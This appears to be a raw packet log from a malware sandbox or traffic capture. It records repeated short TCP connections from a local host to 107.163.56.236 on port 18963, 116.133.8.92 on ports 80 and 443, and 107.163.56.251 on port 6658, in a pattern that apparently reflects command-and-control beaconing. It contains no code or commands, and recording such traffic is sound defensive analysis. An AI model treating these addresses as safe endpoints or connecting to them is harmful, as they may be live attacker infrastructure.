                                                                                                                                    Dec 19, 2024 15:44:13.789907932 CET1896349860107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:13.790004015 CET4986018963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:13.803733110 CET4986118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:13.805699110 CET4986018963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:13.923325062 CET1896349861107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:13.923433065 CET4986118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:13.925431013 CET1896349860107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:13.926978111 CET4986118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:14.046407938 CET1896349861107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.550076962 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.550102949 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.550159931 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.550175905 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.550194979 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.550224066 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.550230980 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.550281048 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.557266951 CET49856443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.557284117 CET44349856116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.675322056 CET4985080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.675642014 CET4986980192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.795409918 CET8049869116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.795458078 CET8049850116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:15.795646906 CET4985080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.795748949 CET4986980192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.795933008 CET4986980192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:15.915494919 CET8049869116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:17.657602072 CET4986980192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:17.657648087 CET4986018963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:17.657675982 CET4986118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:17.659166098 CET4987418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:17.689836025 CET8049869116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:17.689908981 CET4986980192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:17.772615910 CET4987518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:17.775923014 CET4987680192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:17.778778076 CET1896349874107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:17.778888941 CET4987418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:17.779829025 CET4987418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:17.892268896 CET1896349875107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:17.893701077 CET4987518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:17.893923044 CET4987518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:17.896155119 CET8049876116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:17.896244049 CET4987680192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:17.896368980 CET4987680192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:17.899724960 CET1896349874107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:18.013463974 CET1896349875107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:18.015816927 CET8049876116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:19.604732990 CET8049876116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:19.604855061 CET4987680192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:19.619478941 CET49882443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:19.619525909 CET44349882116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:19.619677067 CET49882443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:19.619956017 CET49882443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:19.619965076 CET44349882116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:21.658682108 CET49882443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:21.658723116 CET4987418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:21.658746958 CET4987518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:21.690306902 CET4988918963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:21.810445070 CET1896349889107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:21.813637018 CET4988918963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:21.814888000 CET4988918963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:21.865405083 CET4987680192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:21.865722895 CET4989080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:21.866683960 CET4989118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:21.934429884 CET1896349889107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:21.985356092 CET8049890116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:21.985702991 CET8049876116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:21.985729933 CET4989080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:21.985759020 CET4987680192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:21.986197948 CET4989080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:21.986382961 CET1896349891107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:21.989700079 CET4989118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:21.990005970 CET4989118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:22.105684996 CET8049890116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:22.109539986 CET1896349891107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:24.545500040 CET8049890116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:24.545572042 CET4989080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:24.549632072 CET49897443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:24.549673080 CET44349897116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:24.549761057 CET49897443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:24.550085068 CET49897443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:24.550100088 CET44349897116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:25.829240084 CET4989118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:25.829272032 CET49897443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:25.829313993 CET4988918963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:25.831084967 CET4990318963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:25.942919016 CET4989080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:25.943305016 CET4990480192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:25.943682909 CET4990518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:25.950598955 CET1896349903107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:25.950735092 CET4990318963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:25.950902939 CET4990318963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:26.063003063 CET8049904116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:26.063021898 CET8049890116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:26.063199997 CET4989080192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:26.063211918 CET4990480192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:26.063460112 CET1896349905107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:26.063525915 CET4990518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:26.065944910 CET4990480192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:26.066159964 CET4990518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:26.070430994 CET1896349903107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:26.185528994 CET8049904116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:26.185668945 CET1896349905107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:29.845942020 CET4990480192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:29.845987082 CET4990518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:29.846025944 CET4990318963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:29.846751928 CET4991618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:29.958270073 CET4991718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:29.961352110 CET4991880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:29.966382027 CET1896349916107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:29.966480970 CET4991618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:29.966614008 CET4991618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:30.079833984 CET1896349917107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:30.079967976 CET4991718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:30.080513954 CET4991718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:30.080929041 CET8049918116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:30.080990076 CET4991880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:30.081068039 CET4991880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:30.089689016 CET1896349916107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:30.200867891 CET1896349917107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:30.201683044 CET8049918116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:32.696099997 CET8049918116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:32.697809935 CET4991880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:32.700773954 CET49925443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:32.700830936 CET44349925116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:32.700970888 CET49925443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:32.701271057 CET49925443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:32.701286077 CET44349925116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:33.860436916 CET4991618963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:33.860452890 CET4991718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:33.860481977 CET49925443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:33.861788988 CET4993118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:33.974404097 CET4991880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:33.974920988 CET4993280192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:33.977386951 CET4993318963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:33.983946085 CET1896349931107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:33.984067917 CET4993118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:33.984309912 CET4993118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:34.095704079 CET8049918116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:34.095756054 CET8049932116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:34.095940113 CET4991880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:34.096035004 CET4993280192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:34.096609116 CET4993280192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:34.098579884 CET1896349933107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:34.098690987 CET4993318963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:34.098803043 CET4993318963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:34.106734037 CET1896349931107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:34.216125011 CET8049932116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:34.218255997 CET1896349933107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:35.942162991 CET8049932116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:35.942348003 CET4993280192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:35.944744110 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:35.944787025 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:35.944856882 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:35.945074081 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:35.945089102 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:37.815800905 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:37.816004038 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:37.816648006 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:37.816725016 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:37.827132940 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:37.827157021 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:37.827466965 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:37.827524900 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:37.828140020 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:37.875329971 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:37.876349926 CET4993118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:37.876494884 CET4993318963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:37.877017975 CET4994118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:37.994467974 CET4994218963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:37.996601105 CET1896349941107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:37.996714115 CET4994118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:37.996845961 CET4994118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:38.114084005 CET1896349942107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.114183903 CET4994218963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:38.114346027 CET4994218963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:38.117132902 CET1896349941107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.234997034 CET1896349942107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.622896910 CET665849808107.163.56.251192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.623016119 CET498086658192.168.2.7107.163.56.251
                                                                                                                                    Dec 19, 2024 15:44:38.736982107 CET499456658192.168.2.7107.163.56.251
                                                                                                                                    Dec 19, 2024 15:44:38.819076061 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.819104910 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.819142103 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:38.819166899 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.819183111 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:38.819219112 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:38.856878042 CET665849945107.163.56.251192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.857033968 CET499456658192.168.2.7107.163.56.251
                                                                                                                                    Dec 19, 2024 15:44:38.857491016 CET499456658192.168.2.7107.163.56.251
                                                                                                                                    Dec 19, 2024 15:44:38.860982895 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.861056089 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.861072063 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:38.861112118 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:38.864301920 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:38.864321947 CET44349937116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:38.864336014 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:38.864372969 CET49937443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:38.977159023 CET665849945107.163.56.251192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:39.016561985 CET4993280192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:39.017699003 CET4994880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:39.137042999 CET8049932116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:39.137114048 CET4993280192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:39.137370110 CET8049948116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:39.137701988 CET4994880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:39.137862921 CET4994880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:39.258212090 CET8049948116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:40.914382935 CET8049948116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:40.914475918 CET4994880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:40.984940052 CET49953443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:40.984992027 CET44349953116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:40.985064030 CET49953443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:40.985567093 CET49953443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:40.985579014 CET44349953116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:41.891937971 CET4994118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:41.891943932 CET4994218963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:41.891977072 CET49953443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:41.893091917 CET4995518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:42.005234003 CET4995718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:42.005667925 CET4995880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:42.005714893 CET4994880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:42.012782097 CET1896349955107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:42.013787031 CET4995518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:42.014028072 CET4995518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:42.125686884 CET1896349957107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:42.125807047 CET4995718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:42.126000881 CET8049958116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:42.126342058 CET8049948116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:42.126363039 CET4995880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:42.126410961 CET4995718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:42.126411915 CET4994880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:42.126972914 CET4995880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:42.133472919 CET1896349955107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:42.245903015 CET1896349957107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:42.246414900 CET8049958116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:45.785994053 CET8049958116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:45.786071062 CET4995880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:45.791655064 CET49967443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:45.791697025 CET44349967116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:45.791778088 CET49967443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:45.792244911 CET49967443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:45.792258978 CET44349967116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:45.892187119 CET4995518963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:45.892189026 CET49967443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:45.892216921 CET4995718963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:45.893035889 CET4996818963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:46.012872934 CET1896349968107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:46.013020992 CET4996818963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:46.075443983 CET4996818963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:46.195672989 CET1896349968107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:46.251287937 CET4997018963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:46.252057076 CET4995880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:46.252660990 CET4997180192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:46.370908976 CET1896349970107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:46.371063948 CET4997018963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:46.371279001 CET4997018963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:46.371861935 CET8049958116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:46.371916056 CET4995880192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:46.372176886 CET8049971116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:46.372243881 CET4997180192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:46.372374058 CET4997180192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:46.490757942 CET1896349970107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:46.491810083 CET8049971116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:50.066090107 CET4996818963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:50.066129923 CET4997180192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:50.066133976 CET4997018963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:50.066642046 CET4998118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:50.177200079 CET4998218963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:50.178608894 CET4998380192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:50.186290979 CET1896349981107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:50.186518908 CET4998118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:50.186664104 CET4998118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:50.297799110 CET1896349982107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:50.298006058 CET4998218963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:50.299334049 CET4998218963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:50.299355984 CET8049983116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:50.299432039 CET4998380192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:50.299508095 CET4998380192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:50.306622028 CET1896349981107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:50.418874979 CET1896349982107.163.56.236192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:50.420331955 CET8049983116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:52.138010025 CET8049983116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:52.138072968 CET4998380192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:52.141153097 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:52.141218901 CET44349989116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:52.141299009 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:52.141563892 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:52.141578913 CET44349989116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:54.008619070 CET44349989116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:54.008713007 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:54.009423971 CET44349989116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:54.009471893 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:54.012588024 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:54.012614012 CET44349989116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:54.012937069 CET44349989116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:54.012988091 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:54.013420105 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:54.055368900 CET44349989116.133.8.92192.168.2.7
                                                                                                                                    Dec 19, 2024 15:44:54.079495907 CET49989443192.168.2.7116.133.8.92
                                                                                                                                    Dec 19, 2024 15:44:54.079516888 CET4998218963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:54.079535007 CET4998118963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:54.080269098 CET4999418963192.168.2.7107.163.56.236
                                                                                                                                    Dec 19, 2024 15:44:54.193977118 CET4999518963192.168.2.7107.163.56.236
